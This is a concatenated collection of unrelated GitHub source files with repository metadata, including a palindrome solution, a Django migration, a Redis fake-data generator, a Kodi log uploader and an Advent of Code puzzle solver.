return get_main_selector_for_url(url)
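# --- Added usage sketch (assumption, not part of the original module): needs a
# local Firefox/geckodriver plus lxml and scrapy installed, so it stays commented:
# if __name__ == '__main__':
#     selector = get_main_selector_for_url('https://example.com/docs/')
#     print("Detected main content selector: {}".format(selector))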
|
[
"maxiloc@gmail.com"
] |
maxiloc@gmail.com
|
1e2395c1352d22684243cbf83255cac2470bbc1a
|
d8a9b88f4087ebfe97b462e589071222e2261e47
|
/125. Valid Palindrome.py
|
d2ce188678dfc75e5a238a10d806eabd8d8cda2e
|
[] |
no_license
|
rohitpatwa/leetcode
|
a7a4e8a109ace53a38d613b5f898dd81d4771b1b
|
f4826763e8f154cac9134d53b154b8299acd39a8
|
refs/heads/master
| 2021-07-07T12:40:30.424243
| 2021-03-31T00:21:30
| 2021-03-31T00:21:30
| 235,003,084
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
# Use two pointers, one at beginning, one at end. Run 2 while loops inside a one while loop to skip all non alphanumeric charectes
class Solution(object):
def isPalindrome(self, s):
"""
:type s: str
:rtype: bool
"""
i,j = 0, len(s)-1
if not s:
return True
s = s.lower()
while True:
while i<j and not self.is_valid(s[i]):
i += 1
while i<j and not self.is_valid(s[j]):
j -= 1
if i>=j:
return True
if s[i]!=s[j]:
return False
i += 1
j -= 1
def is_valid(self, c):
if (ord(c) >= 48 and ord(c)<=57) or (ord(c) >=97 and ord(c)<=122):
return True
return False
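# --- Added usage sketch (not part of the original solution):
if __name__ == "__main__":
    sol = Solution()
    print(sol.isPalindrome("A man, a plan, a canal: Panama"))  # True
    print(sol.isPalindrome("race a car"))                      # False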
|
[
"rohitpatwa@gmail.com"
] |
rohitpatwa@gmail.com
|
59697120b8ffbd3cedbe04dd4e2fb5090e110650
|
cc4e37f21d4141dce49dda703217a403064bac80
|
/login/migrations/0001_initial.py
|
74def4468d064ff4cd157d0f2530be8cad099521
|
[] |
no_license
|
pragyamittal0/Oxywin
|
7e28a9d8fae975f18fdc30bf1de04a71f43fad33
|
a559aff3e92981e912ebead287e17a1ec141f22d
|
refs/heads/main
| 2023-04-12T05:43:00.186149
| 2021-05-16T12:41:46
| 2021-05-16T12:41:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,779
|
py
|
# Generated by Django 3.2 on 2021-05-15 18:34
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Hospital',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('state', models.CharField(max_length=50)),
('pincode', models.IntegerField()),
('email', models.CharField(max_length=200)),
('storage', models.IntegerField()),
('rate', models.IntegerField()),
('available', models.IntegerField()),
('hours', models.IntegerField()),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hospital_ID', models.IntegerField()),
('vendor_ID', models.IntegerField()),
('transporter_ID', models.IntegerField()),
('quantity', models.IntegerField()),
('hours', models.IntegerField()),
('status', models.IntegerField()),
('SOS', models.IntegerField()),
],
),
migrations.CreateModel(
name='Producer',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('state', models.CharField(max_length=50)),
('pincode', models.IntegerField()),
('email', models.CharField(max_length=200)),
('storage', models.IntegerField()),
('rate', models.IntegerField()),
('available', models.IntegerField()),
],
),
migrations.CreateModel(
name='Transporter',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('state', models.CharField(max_length=50)),
('pincode', models.IntegerField()),
('email', models.CharField(max_length=200)),
('avail_tanker', models.IntegerField()),
('capacity', models.IntegerField()),
('total_tanker', models.IntegerField()),
],
),
]
|
[
"agrawalarvind00@gmail.com"
] |
agrawalarvind00@gmail.com
|
34b1942345da09183a9739296fbff2b396d196d9
|
372b868dbf2bef3122ab20f3a06561bf6204a268
|
/task5.py
|
50a55c2079c5c1dccd6cd06f717ecb566c699ecd
|
[] |
no_license
|
Bahram3110/d9_w2_t4
|
f9c84e9061316fe4db2a710bf122bc4084c82e63
|
9b15d6ef4e1e450657f84dd3d80c0879f5934aeb
|
refs/heads/master
| 2022-11-25T09:48:10.413958
| 2020-07-19T14:50:09
| 2020-07-19T14:50:09
| 280,887,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
input_values1 = input('Enter the first value:')
input_values2 = input("Enter the second value:")
input_values3 = input('Enter the third value:')
a = input_values1 == input_values2 and input_values1 == input_values3
b = input_values2 == input_values1 and input_values2 == input_values3
c = input_values3 == input_values1 and input_values3 == input_values2
print(a)
print(b)
print(c)
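# example: entering 7, 7, 7 prints True three times; entering 7, 7, 8 prints
# False three times, since each variable is compared against the other two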
|
[
"maraimov.2309@gmail.com"
] |
maraimov.2309@gmail.com
|
a23c8576a3720335cd617ad04606132678a7e5cf
|
5cb9254e0ca1020e7487660565037e71d2a883ba
|
/build/my_robot/catkin_generated/pkg.installspace.context.pc.py
|
4c14ea9f60df354a67613cfd1035d1b0db8e5508
|
[] |
no_license
|
chinmaydas96/RBND-Where-Am-I
|
3eb3f1ea60c51b306d14a4a58cd51c203c1f7bfd
|
9375064cf9b9bc7500839be76b6f7a71b26ac59d
|
refs/heads/master
| 2022-04-25T18:45:23.394944
| 2020-04-28T06:44:51
| 2020-04-28T06:44:51
| 259,441,688
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "my_robot"
PROJECT_SPACE_DIR = "/home/robond/workspace/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
|
[
"chinmaydasbat@gmail.com"
] |
chinmaydasbat@gmail.com
|
d947b4784f791c097161970c2e7ae510dc19e47c
|
de6ec270badbdd5f6914c3a477f1cab8f2db6d11
|
/PythonExercicios/ex093.py
|
5b4d1f71706227772a27ecbaa336eaf3da0d5184
|
[
"MIT"
] |
permissive
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
34e5a6230ec6aa67433f231d8b93e8cf3b02e989
|
0045464a287f21b6245554a975588cf06c5b476d
|
refs/heads/main
| 2023-04-16T09:54:16.173343
| 2021-04-26T22:01:07
| 2021-04-26T22:01:07
| 312,078,038
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
jogador = {'nome': str(input('Name: '))}
lista = list()
totGols = 0
tot = int(input('Total matches played: '))
if tot > 0:
    for partida in range(1, tot + 1):
        gols = (int(input(f'Goals scored in match {partida}: ')))
        lista.append(gols)
        totGols += gols
jogador['gols'] = lista
jogador['totGols'] = totGols
print('-=' * 20)
print(f'Name: {jogador["nome"]}')
if tot > 1:
    contador = 0
    print(f'List of goals scored: {jogador["gols"]}')
    print(f'Total goals: {jogador["totGols"]}')
    print('-=' * 20)
    for gol in jogador['gols']:
        contador += 1
        print(f'Goals scored in match {contador}: {gol}')
    print(f'That was a total of {jogador["totGols"]} goals.')
else:
    print(f'Total games played: {tot}')
print('-=' * 20)
print('Thank you for using our program, come back soon!')
|
[
"felipe.lima.eu@hotmail.com"
] |
felipe.lima.eu@hotmail.com
|
ff97b2954d50623612af85b24c68f49356c68d54
|
852bfc2c22d8f59e029c6a09f6ca8d01570729af
|
/generate_cases.py
|
95efda5d29221d7850a30d25f7cc32e18fc83ce7
|
[] |
no_license
|
Redislabs-Solution-Architects/redisaml
|
7c4cac467417ce834bc5e86edd9d538e8a9e95d2
|
db71250e09d79c35361fa6837e619c2f9edb8f01
|
refs/heads/master
| 2023-06-22T19:41:18.808583
| 2021-07-23T13:52:23
| 2021-07-23T13:52:23
| 330,031,028
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,338
|
py
|
from redis import Redis
from redis.exceptions import ResponseError,ConnectionError
from os import environ,urandom,fork
from uuid import uuid1,uuid4
import random
from time import sleep
from logging import debug, info
from faker import Faker
import json
import itertools
'''
REDIS_HOSTNAME optional (default localhost)
REDIS_PORT optional (default 6379)
NAMESPACE optional (default case)
COUNT optional (default 10000)
PAINT optional (default False)
Example:
$ export REDIS_HOSTNAME=localhost; export REDIS_PORT=14000;
export NAMESPACE=case; export COUNT=10000;
python3 generate_cases.py
'''
'''
returns a coherent record for a financial crimes case record
'''
def create_record(fake, id):
record = {}
statuses = ["new","investigating","resolved","on-hold","archived"]
priorities = ["low","med","high"]
date_range = [1389576338,1601861138] # Jan 13 2014 to Oct 5 2020
record["caseid"] = 10320000000 + id
record["status"] = statuses[random.randrange(0,len(statuses))]
record["investigator"] = random.randrange(501001,501501)
record["value"] = int(abs(random.gauss(10000,300000)))
record["files"] = str(uuid1()).replace("-","")
for _ in itertools.repeat(None,random.randrange(1,8)):
record["files"] = record["files"] + "," + str(uuid4()).replace("-","")
record["date_reported"] = random.randrange(date_range[0],date_range[1])
record["date_last_updated"] = record["date_reported"] + random.randrange(1728000,8640000) # + 20 days or 100 days
record["report_body"] = fake.text()
record["primary_acctno"] = fake.ean8(prefixes=("41","82","21","97"))
record["ssn"] = str(fake.ssn()).replace("-","")
record["phone"] = fake.phone_number()
record["ip"] = fake.ipv4()
# first, middle, last, address, country, ip
record["account_details"] = json.dumps(
{"Full Name": fake.name(),
"Street": fake.street_address(),
"Country": "US", "State": "NB",
"PostCode": fake.postcode()}
)
record["priority"] = priorities[random.randrange(0,len(priorities))]
record["related_tags"] = record["primary_acctno"]
for _ in itertools.repeat(None,random.randrange(4,19)):
record["related_tags"] = record["related_tags"] + "," + fake.ean8(prefixes=("41","82","21","97"))
# print(record)
return record
def paint(r, record_total, num_tags, num_sources, num_targets):
# get some related tags from existing records
seeds = r.scan(match="{}*".format(namespace),count=3)[1]
# print(seeds)
taglist = list()
for result in seeds:
tags = r.hget(result,"related_tags").split(",")
# print("tags: {}".format(tags))
for tag in tags[0:len(tags)-4]:
taglist.append(tag)
random.shuffle(taglist) # shuffle so it is less deterministic
# print(taglist)
# create the list of tags to be added to cases
to_be_added_tags = ""
for i in range(1,num_tags):
to_be_added_tags = to_be_added_tags + "," + taglist[i]
# print("{},".format(taglist[i]),flush=False,sep='',end='')
print("--- Tags to be added: {}".format(to_be_added_tags))
for _ in itertools.repeat(None, random.randrange(3,3+num_sources)):
# # find one target case
# sample = random.sample(r.scan(match="{}*".format(namespace),count=15)[1],1)
# print("******\n*** Main target case: {} ***\n******".format(sample))
targets = list()
for _ in itertools.repeat(None, random.randrange(3,3+num_targets)):
targets.append(namespace + str(create_record(fake, random.randrange(1,int(record_total)))["caseid"]))
print("Targets: {}".format(targets))
for target in targets:
related_tags = r.hget(target,"related_tags")
related_tags = related_tags + to_be_added_tags
#put record back
r.hset(target,"related_tags",related_tags)
print("\n")
if __name__ == '__main__':
batch = 1
count = environ.get('COUNT',10000)
redis_hostname = environ.get('REDIS_HOSTNAME','localhost')
redis_port = environ.get('REDIS_PORT',6379)
namespace = environ.get('NAMESPACE', "case") + ":"
paint_only = environ.get('PAINT',False)
r = Redis(host=redis_hostname, port=redis_port, decode_responses=True)
fake = Faker()
if paint_only:
print("### Painting records. ### ")
paint(r,count,num_tags=5,num_sources=6,num_targets=7)
exit()
else:
counter = 0
while counter <= int(count):
with r.pipeline(transaction=False) as pipe:
pipe.multi()
for _ in itertools.repeat(None, batch):
record = create_record(fake,counter)
if counter == 0:
print("Sample record: {}".format(json.dumps(record, indent=4)))
pipe.hset("{}{}".format(namespace,record["caseid"]),mapping=record)
counter = counter + 1
pipe.execute()
if counter % 1000 == 0 :
print(".",end="",flush=True)
print("\nFinished writing {} records.".format(counter))
print("### Painting records. ### ")
paint(r,count,num_tags=5,num_sources=6,num_targets=7)
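# --- Added read-back sketch (assumption, not part of the original script):
# with the default namespace, records land under the "case:" prefix, e.g.
#   r = Redis(host='localhost', port=6379, decode_responses=True)
#   print(r.hgetall('case:10320000042'))  # caseid = 10320000000 + record index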
|
[
"bbarnes@gmail.com"
] |
bbarnes@gmail.com
|
aeaa4ae222e109143d6db2ea3a9d6fc5c7073bad
|
9bd8ca4413654633d2f6903170cae35de7ed3cc9
|
/borobudur/pylib/peppercorn.py
|
9aae6f10bcaf788fcc477602439485b5d31e5e62
|
[] |
no_license
|
microvac/borobudur
|
841a2469ee7e98bdf2154d1f474578f98062d7b6
|
f5a39f027ad5ea5a49fd7a8fa23964d1ea14baf2
|
refs/heads/master
| 2016-09-05T16:09:02.946995
| 2013-07-26T17:40:10
| 2013-07-26T17:40:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,866
|
py
|
def data_type(value):
if ':' in value:
parts = value.split(":")
return [ parts[0].strip(), parts[1].strip() ]
return ('', value.strip())
def next(iterator):
idx = iterator["i"]
idx += 1
iterator["i"] = idx
return iterator["list"][idx]
def iter(item):
return {"i": -1, "list":item}
def partial(fn, arg):
def part():
return fn(arg)
return part
START = '__start__'
END = '__end__'
SEQUENCE = 'sequence'
MAPPING = 'mapping'
RENAME = 'rename'
all_typs = (SEQUENCE, MAPPING, RENAME)
def stream(next_token_gen, token):
"""
thanks to the effbot for
http://effbot.org/zone/simple-iterator-parser.htm
"""
op, data = token
if op == START:
name, typ = data_type(data)
out = []
if typ in all_typs:
if typ == MAPPING:
out = {}
def add(x, y):
out[x]= y
else:
out = []
add = lambda x, y: out.append(y)
token = next_token_gen()
op, data = token
while op != END:
key, val = stream(next_token_gen, token)
add(key, val)
token = next_token_gen()
op, data = token
if typ == RENAME:
if out:
out = out[0]
else:
out = ''
return name, out
else:
raise ValueError('Unknown stream start marker %s' % token)
else:
return op, data
def parse(fields):
""" Infer a data structure from the ordered set of fields and
return it."""
f = []
f.append((START, MAPPING))
f.extend(fields)
f.append((END, ''))
fields = f
src = iter(fields)
sr = stream(partial(next, src), next(src))
result = sr[1]
return result
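# --- Added usage sketch (not part of the original module), using the
# peppercorn-style field markers this parser understands:
if __name__ == '__main__':
    fields = [
        ('__start__', 'series:mapping'),
        ('name', 'date series 1'),
        ('__start__', 'dates:sequence'),
        ('day', '10'),
        ('day', '12'),
        ('__end__', 'dates:sequence'),
        ('__end__', 'series:mapping'),
    ]
    # -> {'series': {'name': 'date series 1', 'dates': ['10', '12']}}
    print(parse(fields))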
|
[
"ghk@gozalikumara.com"
] |
ghk@gozalikumara.com
|
3a9fdf28d423ec47e703d3ba12a13aa87c65ffe0
|
eff67fc06b36bc58ebbb54322e6ba2ca248705c6
|
/server/sadserver.py
|
b17a69122f500cdefb47e9f09de87ed241ac9436
|
[] |
no_license
|
diacus/celda
|
af5180ea3fe0826839d398808c553c90162b472e
|
29fac053c1b7141133472c65569f424bcb3b087e
|
refs/heads/master
| 2020-05-17T22:31:30.174875
| 2011-08-04T21:37:15
| 2011-08-04T21:37:15
| 2,157,200
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,945
|
py
|
# -*- coding:utf-8 -*-
"""
@file sadserver.py
sadserver module
"""
import os, logging
from data.message import Message
from data.stream import FileStream, FragmentStream, BlockStream
from lib.common import MessagesENG as Messages, splitstream, \
notimplementedfunction
from lib.config import SADConfig
from lib.ida import disperse, recover
from lib.saderror import CorruptedFile
from server.sadnode import Node, Handler
from xmlrpclib import Fault
class ServerHandler(Handler):
"""
Class for handle requests
"""
def __init__(self):
Handler.__init__(self)
self._neighfrag = self._dbase.selectvirtualspaces()
self._neighfrag.choice()
self._neighblock = self._dbase.selectvirtualspaces()
self._neighblock.choice()
def processfile( self, (check, sdata) ):
"""
Splits a stream to a set of fragments and give them to other peers.
@param (check, sdata): Where:
* check is the stream's checksum
* sdata is a dict for build a FileStream instance
@raise CorruptedFile: Raise this exception if the given checksum doesn't
match with the stream's checksum
"""
conf = SADConfig()
stream = FileStream()
stream.load(sdata)
data = stream.getdata()
if not check == stream.checksum():
raise CorruptedFile
if len(stream) > conf.getmsu():
pieces = splitstream(data, conf.getmsu())
msg = Messages.FileSplitUp % (stream.getname(), len(pieces) )
print msg
logging.info( msg )
else:
pieces = [data]
msg = Messages.SmallFile % stream.getid()
print msg
logging.info( msg )
for i, piece in enumerate(pieces):
# Selecting next node
node = self._neighfrag.nextval()
# Packing the fragment stream
frag = FragmentStream(
stream.getid(),
stream.getname(),
i,
stream.getservice(),
piece
)
# Storing meta data
frag.registerfragment(self._dbase, node.getid())
if self.itsme( node ) :
self._localprocessfragment(frag)
else:
# Sending fragment
try:
msg = Messages.SendingFragTo % (
stream.getname(),
i,
node.getname(),
node.geturi()
)
# Logging transaction
print msg
logging.info(msg)
node.client.sendfragment(frag)
except Fault, cf:
print cf
logging.error( str(cf) )
def _localprocessfragment(self, fragment):
"""
@param fragment: FragmentStream instance
@see FragmentStream
"""
serv = fragment.getservice()
msg = Messages.SelectedService % serv
print msg
logging.info(msg)
if serv == "copy":
block = BlockStream(
serv,
fragment.getid(),
fragment.getpos(),
fragment.getdata(),
)
for b in [block, block]:
node = self._neighblock.nextval()
b.registerblock( self._dbase, node.getid())
if self.itsme( node ) :
self._localprocessblock(b)
else:
node.client.sendblock(b)
elif serv == "IDA":
##
# @todo utilizar IDA
for i, b in enumerate( disperse( fragment ) ):
node = self._neighblock.nextval()
b.registerblock( self._dbase, node.getid() )
if self.itsme( node ) :
self._localprocessblock(b)
else:
node.client.sendblock(b)
def processfragment(self, (check, fdata) ):
"""
        @param (check, fdata): the stream's checksum and FragmentStream instance data
@raise CorruptedFile: Raise this exception if the given checksum
doesn't match with the stream's checksum
"""
fragment = FragmentStream()
fragment.load(fdata)
if not check == fragment.checksum():
del fragment
raise CorruptedFile
self._localprocessfragment(fragment)
def _localprocessblock( self, block ):
"""
@param block: FragmentStream instance
"""
conf = SADConfig()
bname = os.path.join( conf.getstoragepath(), block.getfilename() )
msg = Messages.ProcessingBlock % str(block)
logging.info(msg)
print msg
block.savetofile( bname )
def processblock(self, (check, bdata)):
"""
@param check: String. BlockStream's checksum
@param bdata: String, BlockStream's data
"""
block = BlockStream()
block.load(bdata)
if not check == block.checksum():
raise CorruptedFile
self._localprocessblock(block)
class Server ( Node ):
"""
Inner node class
"""
def __init__( self ):
Node.__init__(self)
self.__neighfrag = self._dbase.selectvirtualspaces()
self.__neighidas = self._dbase.selectvirtualspaces()
self._funcs[Message.SAVESTREAM] = ServerHandler.processfile
self._funcs[Message.SAVEFRAGMENT] = ServerHandler.processfragment
self._funcs[Message.SAVEBLOCK] = ServerHandler.processblock
self._funcs[Message.LOADSTREAM] = notimplementedfunction
self._funcs[Message.LOADFRAGMENT] = notimplementedfunction
self._funcs[Message.LOADBLOCK] = notimplementedfunction
|
[
"dr.guzsant@gmail.com"
] |
dr.guzsant@gmail.com
|
c414e9ccd1ff025567382317eb0f2d76d19577e8
|
650b516b1214c4d44fd6f04941e87e28e9049cde
|
/addons/script.mtvguide/logUploader.py
|
b3cfc3e025a8f1e2db88e609883ff4212d0b5e80
|
[] |
no_license
|
MultiWu/build
|
b85cc45a33b871f4ade58de8457fcd094761f385
|
f50a64f674b6499668e0a5758fe0879b016f5c38
|
refs/heads/master
| 2022-10-31T20:35:53.382826
| 2019-12-20T22:50:16
| 2019-12-20T22:50:16
| 228,462,984
| 0
| 3
| null | 2022-10-07T08:47:18
| 2019-12-16T19:46:39
|
Python
|
UTF-8
|
Python
| false
| false
| 2,534
|
py
|
# Copyright (C) 2016 Andrzej Mleczko
import os, urllib, urllib2, httplib, datetime
import xbmc, xbmcgui
from strings import *
URL = 'https://paste.ubuntu.com/'
LOGPATH = xbmc.translatePath('special://logpath')
LOGFILE = os.path.join(LOGPATH, 'kodi.log')
LOGFILE2 = os.path.join(LOGPATH, 'spmc.log')
LOGFILE3 = os.path.join(LOGPATH, 'xbmc.log')
class LogUploader:
def __init__(self):
if os.path.isfile(LOGFILE):
logContent = self.getLog(LOGFILE)
elif os.path.isfile(LOGFILE2):
logContent = self.getLog(LOGFILE2)
elif os.path.isfile(LOGFILE3):
logContent = self.getLog(LOGFILE3)
else:
xbmcgui.Dialog().ok(strings(30150).encode('utf-8'),"\n" + "Unable to find kodi log file")
return
logUrl = self.upload(logContent)
if logUrl:
xbmcgui.Dialog().ok(strings(31004).encode('utf-8'),"\n" + strings(69033).encode('utf-8') + logUrl)
else:
xbmcgui.Dialog().ok(strings(30150).encode('utf-8'),"\n" + strings(69034).encode('utf-8'))
def getLog(self, filename):
if os.path.isfile(filename):
content = None
with open(filename, 'r') as content_file:
content = content_file.read()
if content is None:
deb('LogUploader upload ERROR could not get content of log file')
return content
return None
def upload(self, data):
if data is None:
return None
params = {}
params['poster'] = 'anonymous'
params['content'] = data[-1500000:]
params['syntax'] = 'text'
params['expiration'] = 'week'
params = urllib.urlencode(params)
startTime = datetime.datetime.now()
try:
page = urllib2.urlopen(URL, params, timeout=10)
except Exception, ex:
deb('LogUploader upload failed to connect to the server, exception: %s' % getExceptionString())
deb('LogUploader Uploading files took: %s' % (datetime.datetime.now() - startTime).seconds)
return None
deb('LogUploader Uploading files took: %s' % (datetime.datetime.now() - startTime).seconds)
try:
page_url = page.url.strip()
deb('LogUploader success: %s' % str(page_url))
return page_url
except Exception, ex:
deb('LogUploader unable to retrieve the paste url, exception: %s' % getExceptionString())
return None
logup = LogUploader()
|
[
"oliwierminota@gmail.com"
] |
oliwierminota@gmail.com
|
341c928a26d1bea76347e0194dd5273eb02c961d
|
d0d79d0940f10494860b1363fe7f5cb89b9c9f43
|
/FlaskMain.py
|
969e30c59868d6c66cb3ef6df203df928265b85f
|
[] |
no_license
|
nyaang/GraduationDesign
|
d48cd3ba4b1d545d957aeb1f9b0e77904d6dfc83
|
77e821265bdfbacf983027cf9632e0cc0dd40739
|
refs/heads/master
| 2023-05-28T19:42:30.275301
| 2019-06-04T06:35:49
| 2019-06-04T06:35:49
| 173,213,790
| 0
| 0
| null | 2023-05-22T22:16:10
| 2019-03-01T01:25:06
|
Python
|
UTF-8
|
Python
| false
| false
| 975
|
py
|
from flask import Flask, request, render_template
from Similar import recommendation
app = Flask(__name__)
@app.route('/', methods=['GET'])
def login_form():
return render_template('form.html')
@app.route('/login', methods=['POST'])
def login():
userid = request.form['usernamelogin']
r = recommendation()
qids = r.similar(userid)
from pymongo import MongoClient
client = MongoClient()
db = client['NongGuanJia']
pcoll = db['NongGuanJiaByProblem']
print(qids)
questions = []
for qid in qids:
cursor = pcoll.find({"qid": int(qid) - 140000})
for document in cursor:
print(document)
questions.append(document)
for question in questions:
question['url'] = 'http://www.laodao.so/forum/info/' + \
str(question['qid'])
return render_template('home.html', questions=questions, uid=userid)
if __name__ == '__main__':
app.run()
|
[
"pccettfly@outlook.com"
] |
pccettfly@outlook.com
|
b4e66c85add42b6bd216c6d6d59ede705307c6f3
|
da402e2e618c05b05a57ac7ca8eb1a186791805b
|
/p149.py
|
c10f5c98528344c906b0891ac76a64ec5bb47b35
|
[] |
no_license
|
gandolfreddy/oajudge
|
c6dd923d88cdaba8ea17bc4cc473602d3a232b04
|
a4cbf433294129d276c10e54642731f782c9e424
|
refs/heads/main
| 2023-05-15T06:28:03.409025
| 2021-06-04T07:56:25
| 2021-06-04T07:56:25
| 373,759,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 177
|
py
|
# input
nums = list(map(int, input().split()))
# process
diff = 0
for num in nums:
diff = diff+1 if num % 2 else diff-1
diff = abs(diff)
# output
print(diff)
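# example: input "1 2 3 4" has two odd and two even numbers, so diff nets
# out to abs(0) = 0 and the program prints 0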
|
[
"noreply@github.com"
] |
gandolfreddy.noreply@github.com
|
67a787734cea2260dbf143a15e8b23400cadc45b
|
8275668382d2cfe43f77e4018caf073d78962b7a
|
/software/test.py
|
cfd7562b9e2d92b410d7e8faf2406451e0f816d6
|
[
"MIT"
] |
permissive
|
Extent421/bladeBench
|
15802724c292d10e4f37843cf55d113995cb980c
|
0eb01b88e21e66a7897b3094041196790848b3e0
|
refs/heads/master
| 2020-06-06T06:16:39.672330
| 2018-10-23T06:01:18
| 2018-10-23T06:01:18
| 42,681,998
| 8
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 946
|
py
|
import numpy as np
from numpy import pi
from bokeh.client import push_session
from bokeh.driving import cosine
from bokeh.plotting import figure, curdoc
test = [2,3,None, 0, None,5,None,7]
cleanTest = [value for value in test if value is not None]
print cleanTest, min(cleanTest), max(cleanTest), np.median(np.array( cleanTest )), np.mean(np.array( cleanTest ))
'''
x = np.linspace(0, 4*pi, 80)
y = np.sin(x)
p = figure()
r1 = p.line([0, 4*pi], [-1, 1], color="firebrick")
r2 = p.line(x, y, color="navy", line_width=4)
# open a session to keep our local document in sync with server
session = push_session(curdoc())
@cosine(w=0.03)
def update(step):
# updating a single column of the the *same length* is OK
r2.data_source.data["y"] = y * step
r2.glyph.line_alpha = 1 - 0.8 * abs(step)
curdoc().add_periodic_callback(update, 50)
session.show(p) # open the document in a browser
session.loop_until_closed() # run forever
'''
|
[
"Extent421@gmail.com"
] |
Extent421@gmail.com
|
4c1c01cf9174c1c10fdddd0909563f7a09bff0b5
|
2706fcad2e39cb4b168583d0ec47d06730e265cf
|
/aoc10-part2.py
|
32e46bec2a80a7765fdaf2ca3b1ceb495f2de55a
|
[
"MIT"
] |
permissive
|
robynsen/adventofcode2016
|
9a90a3415b7b396edfb2f311f6a06f15a8f0f7c3
|
83988f7b4c5b03a4c8d5f60cac1423b495c10856
|
refs/heads/master
| 2021-01-13T13:46:13.930971
| 2017-01-29T11:21:18
| 2017-01-29T11:21:18
| 76,351,573
| 0
| 0
| null | 2016-12-14T09:17:34
| 2016-12-13T11:11:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,305
|
py
|
import re
def add_value(my_bots, bot_i, val_n):
if bot_i in my_bots:
my_bots[bot_i].append(val_n)
else:
my_bots[bot_i] = [val_n]
def transfer_chips(my_bots, bot_id):
# note: does not cater to both high and low going to same bot that currently holds one chip
for key, value in my_bot_instr[bot_id].items():
# check if next bot has max chips
if str(value)[:6] != 'OUTPUT' and has_max_chips(my_bots, value):
transfer_chips(my_bots, value)
# now the recipient bot will have < 2 chips
tmp = 0
for key, value in my_bot_instr[bot_id].items():
if key == 'LOW':
tmp = min(my_bots[bot_id])
else:
tmp = max(my_bots[bot_id])
if str(value)[:6] != 'OUTPUT':
# send to next bot
add_value(my_bots, value, tmp)
elif int(str(value)[6:]) < 3:
# send to output
output_chips[int(str(value)[6:])].append(tmp)
my_bots[bot_id].remove(tmp)
def has_max_chips(my_bots, bot_id):
return (bot_id in my_bots and (len(my_bots[bot_id]) > 1))
with open('aoc10-input.txt', 'r') as infile:
# format: value 5 goes to bot 2
add_regex = re.compile(r"value ([0-9]+) goes to bot ([0-9]+)")
# format: bot 2 gives low to bot 1 and high to bot 0
move_regex = re.compile(r"bot ([0-9]+) gives low to (bot|output) ([0-9]+) and high to (bot|output) ([0-9]+)")
# x = for each both ID, a list of chip IDs it holds
my_bots = {}
# x = for each bot ID, a dict of key, value = LOW/HIGH, next bot ID
my_bot_instr = {}
output_chips = [[], [], []]
for line in infile:
add_result = add_regex.match(line)
move_result = move_regex.match(line)
if add_result:
my_value = int(add_result.group(1))
bot_target = int(add_result.group(2))
add_value(my_bots, bot_target, my_value)
elif move_result:
bot_src = int(move_result.group(1))
instr_low = move_result.group(2)
bot_low = int(move_result.group(3))
instr_high = move_result.group(4)
bot_high = int(move_result.group(5))
my_bot_instr[bot_src] = {}
for i in ((instr_low, bot_low, 'LOW'), (instr_high, bot_high, 'HIGH')):
if i[0] == 'bot':
                    my_bot_instr.setdefault(bot_src,{}).update({i[2]: i[1]})  # dict default: .update() is a dict method
elif i[0] == 'output':
                    my_bot_instr.setdefault(bot_src,{}).update({i[2]: 'OUTPUT' + str(i[1])})
# bots 174 125 59 output to 0, 1, 2
result = False
while not result:
# find bot with two chips and pass those on
for key, value in my_bots.items():
if len(value) > 1:
transfer_chips(my_bots, key)
break
result = True
for key, value in my_bots.items():
if len(value) > 1:
result = False
print('output_chips[0] * output_chips[1] * output_chips[2] =',
output_chips[0][0], '*', output_chips[1][0], '*', output_chips[2][0],
'=',
output_chips[0][0] * output_chips[1][0] * output_chips[2][0])
|
[
"noreply@github.com"
] |
robynsen.noreply@github.com
|
2e4b2ad75cda12788d8ceaba15754a4d584b3989
|
1f96ef70e6d58eac676490aee2b0557b66664360
|
/RL-Quadcopter-2/takeoff.py
|
ab0d0fe1d5ace15b9ee34cde940b4bc7fd751659
|
[] |
no_license
|
jrana1218/Udacity-Deep-Learning
|
6a4c079024a0e0e14b4cf022e3829aaba9e6c7b9
|
78daea32ef129068b804903cbdbd517de4dc7ef3
|
refs/heads/master
| 2021-04-12T09:28:48.108376
| 2018-06-13T01:49:43
| 2018-06-13T01:49:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,819
|
py
|
import numpy as np
from tasks.physics_sim import PhysicsSim
class Task():
"""Task (environment) that defines the goal and provides feedback to the agent."""
def __init__(self, init_pose=None, init_velocities=None,
init_angle_velocities=None, runtime=5., target_pos=None):
"""Initialize a Task object.
Params
======
init_pose: initial position of the quadcopter in (x,y,z) dimensions and the Euler angles
init_velocities: initial velocity of the quadcopter in (x,y,z) dimensions
init_angle_velocities: initial radians/second for each of the three Euler angles
runtime: time limit for each episode
target_pos: target/goal (x,y,z) position for the agent
"""
# Simulation
